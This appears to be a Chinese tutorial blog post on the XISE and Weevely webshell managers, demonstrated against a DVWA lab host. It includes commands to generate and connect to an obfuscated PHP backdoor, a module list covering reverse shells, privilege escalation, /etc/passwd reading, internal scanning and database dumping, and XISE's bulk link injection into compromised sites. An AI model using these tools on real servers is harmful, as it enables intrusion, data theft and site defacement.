文件上传漏洞(七)XISE寄生虫Weevely学习

简介: 文件上传漏洞(七)XISE寄生虫Weevely学习

image.png

XISE简介

XISE WBMS(寄生虫)可以看出是中国菜刀的升 级版,除了支持常规的webshell批量管理、文件 管理和数据库管理之外

支持PHP、ASP、ASPX、JSP不同环境,支持 SEO所需要的批量挂链、批量内页等功能  

支持批量导入txt和菜刀数据库,支持自动上传 shell  

操作使用

批量导入菜刀数据库

image.png

文件管理

image.png

自动上传shell

第一次使用右键点击添加

在已经被控制的web也可以上传自动生成的小马,自动生成的小马也会自动生成链接

image.png

image.png image.png

image.png

Weevely

简介

image.png

Weevely是一种武器化的Web Shell,它是为了后渗tou测试而设计的。它可以在运行时通过网络对其进行扩展。使用Weevely,您可以在没有命令行访问权限的情况下管理远程Web服务器。以下是Weevely的两个用法示例:

生成Weevely PHP代理:

weevely generate <password>

这将生成一个名为weevely.php的PHP文件,您可以将其上传到目标Web服务器上。

连接Weevely PHP代理:

weevely <URL> <password> [cmd]

这将连接到目标Web服务器上的Weevely PHP代理。如果提供了可选的cmd参数,则将在连接后立即执行该命令。

除了支持shell管理之外,还支持文件管理、安全 审计、数据库管理、HTTP代理、内网渗tou

可以根据Weevely API文档,基于Python编写自己 的拓展功能  

地址为: https://github.com/epinna/weevely3

基础使用

安装weevely  

kali linux已集成,在Linux中输入Weevely就得到一下帮助命令

image.png

生成webshell  

weevely generate <password> <path> //加密码加路径

image.png

weevely generate pass123 ~/Desktop/hack2.php  

直接在生成shell文件到桌面

image.png

这款工具只能支持PHP不能支持别的架构

查看Webshell  

cd /usr/share/weevely/  

ls

image.png

more hack.php  

经过混绕编码后的后门

上传Webshell

image.png

连接webshell

weevely <URL> <password> [cmd]

weevely http://172.16.70.214/dvwa/hackable/uploads/hack.php 123456

image.png

功能详解

help

帮助文档命令,可以看到命令提示

image.png

shell

image.png

:shell_php Execute PHP commands.  

:shell_sh Execute Shell  commands.  

:shell_su Elevate privileges with su command.  

:backdoor_reversetcp Execute a reverse TCP shell.  

:backdoor_tcp Spawn a shell on a TCP port.  

审计

image.png

:audit_phpconf Audit PHP configuration.  

:audit_suidsgid Find files with SUID or SGID flags.  

:audit_filesystem Audit system files for wrong permissions.  

:audit_etcpasswd Get /etc/passwd with different techniques.  

系统

image.png

:system_extensions Collect PHP and webserver extension list.  

:system_info Collect system information.  

网络

image.png

:net_phpproxy Install PHP proxy on the target.  

:net_curl Perform a curl-like HTTP request.  

:net_proxy Proxify local HTTP traffic  passing through the target.  

:net_ifconfig Get network interfaces addresses.  

:net_scan TCP Port scan.  

数据库

image.png

:bruteforce_sql Bruteforce SQL database.  

:sql_dump Multi dbms mysqldump replacement.  

:sql_console Execute SQL query or run console.  

文件

image.png

:file_upload2web Upload file automatically to a web folder and get corresponding URL.

:file_upload Upload file to remote filesystem.

:file_read Read remote file from the remote filesystem.

:file_cp Copy single file.

:file_gzip Compress or expand gzip files.

:file_tar Compress or expand tar archives.

:file_enum Check existence and permissions of a list of paths.

:file_ls List directory content.

:file_check Get remote file information.

:file_find Find files with given names and attributes.

:file_download Download file to remote filesystem.

:file_rm Remove remote file.

:file_touch Change file timestamp.

:file_cd Change current working directory.

:file_webdownload Download URL to the filesystem

:file_mount Mount remote filesystem using HTTPfs.

:file_grep Print lines matching a pattern in multiple files.

:file_zip Compress or expand zip files.

:file_bzip2 Compress or expand bzip2 files.

:file_edit Edit remote file on a local  editor.  

虚拟终端

虚拟终端就和我们正常使用Linux一样

ls //查看当前文件夹

uname -a // uname -a命令用于显示所有系统信息,包括内核名称、主机名、内核版本、操作系统类型等等

pwd //pwd是一个Linux命令,用于打印当前工作目录的绝对路径。

cat /etc/passwd //cat /etc/passwd是一个Linux命令,用于查看本地系统上的用户列表。该命令将打印出一个文本文件,其中包含了系统上所有用户的用户名、用户ID、组ID、用户主目录、默认shell等信息。

信息探测  

查看系统信息  

:system_info  //查看系统核心信息

:system_extensions //查看网站安装模块和插件

查看网络信息

说明  

网络信息探测主要用于内网渗透,通过本地主机和网络信息,扫描其他服务器和开放的服务

:net_ifconfig //查看多张网卡

:net_scan  //看看局域网开放端口扫描(基于渗tou机作为跳板进行内网横向)

查看审计信息  

说明

通过审计,了解这个系统的脆弱性,例如不安全 配置、可读性文件、账号信息等  

:audit_filesystem //查看目标服务器有哪些文件是可写入的

:audit_phpconf  //PHP敏感的配置文件

:system_info  //目标操作系统信息

:system_extensions  //查看PHP、阿帕奇拓展文件和插件

网络层面可以使用net

:net_ifconfig // 可以看到网段

:net_scan //指定一个目标网段或ip地址加端口比如1-100端口,扫描开放的端口。也可以跳着写IP地址和端口号,用英文逗号隔开

image.png

文件管理  

:file_upload //本地上传文件

:file_upload2web //上传文件生成shell文件路径

:file_download  //指定肉鸡文件下载到本地

:file_read  //查看一个文件内容















相关文章
|
5月前
|
安全 Shell 网络安全
文件上传漏洞(四)edjpgcom
文件上传漏洞(四)edjpgcom
|
5月前
|
安全 Java Linux
文件上传漏洞(三)Cknife
文件上传漏洞(三)Cknife
|
5月前
|
存储 SQL 开发框架
文件上传漏洞 原理利用防御实战
文件上传漏洞 原理利用防御实战
|
5月前
|
开发框架 安全 JavaScript
文件上传漏洞(五)一句话合集
文件上传漏洞(五)一句话合集
|
8月前
|
安全 JavaScript API
文件上传漏洞——绕过
绕过客户端检测(JS检测) 绕过服务端检测(MIME类型检测、文件后缀检测、文件内容检测)
154 1
|
8月前
|
SQL 监控 安全
探索网络安全:浅析文件上传漏洞
网络安全是一场没有硝烟的战争,它要求我们时刻保持警惕,不断学习与适应。无论是采用强密码、数据加密,还是定期更新软件、安装安全软件,每一项措施都是我们构建网络安全防线的基石。同时,我们也应意识到,技术手段之外,提升安全意识、培养安全习惯同样至关重要。
|
8月前
|
开发框架 安全 JavaScript
文件上传漏洞
文件上传漏洞允许攻击者上传可执行脚本,获取服务器控制权。常见原因包括服务器配置不当、验证不严等。防御措施包括设置不可执行的上传目录、严格文件类型检查、随机化文件名和路径,以及使用独立的文件服务器域名。WebShell是上传的恶意脚本,常用于控制网站服务器。
131 0
|
10月前
|
开发框架 安全 .NET
文件上传漏洞技术总结
该文总结了文件上传技术相关的漏洞和绕过方法,包括语言可解析的后缀(如phtml、pht)、常见的MIME类型、Windows特性(如大小写、ADS流、特殊字符)、0x00截断技巧(需满足PHP版本和magic_quotes_gpc状态)、POST型0x00截断、文件头检查(通过合成图片马绕过)、二次渲染(利用未修改部分插入恶意代码)以及各种服务器的解析漏洞(Apache的.htaccess、解析漏洞,IIS的目录解析、文件解析、默认解析和IIS 7.x/Nginx的畸形解析)。此外,还提到了Java的空字节截断问题。
226 1
文件上传漏洞技术总结
|
10月前
|
存储 安全 前端开发
【网络安全】文件上传漏洞
【网络安全】文件上传漏洞
208 1
【网络安全】文件上传漏洞
|
开发框架 安全 Java
【每日渗透笔记】文件上传绕过尝试
【每日渗透笔记】文件上传绕过尝试
371 0
【每日渗透笔记】文件上传绕过尝试

热门文章

最新文章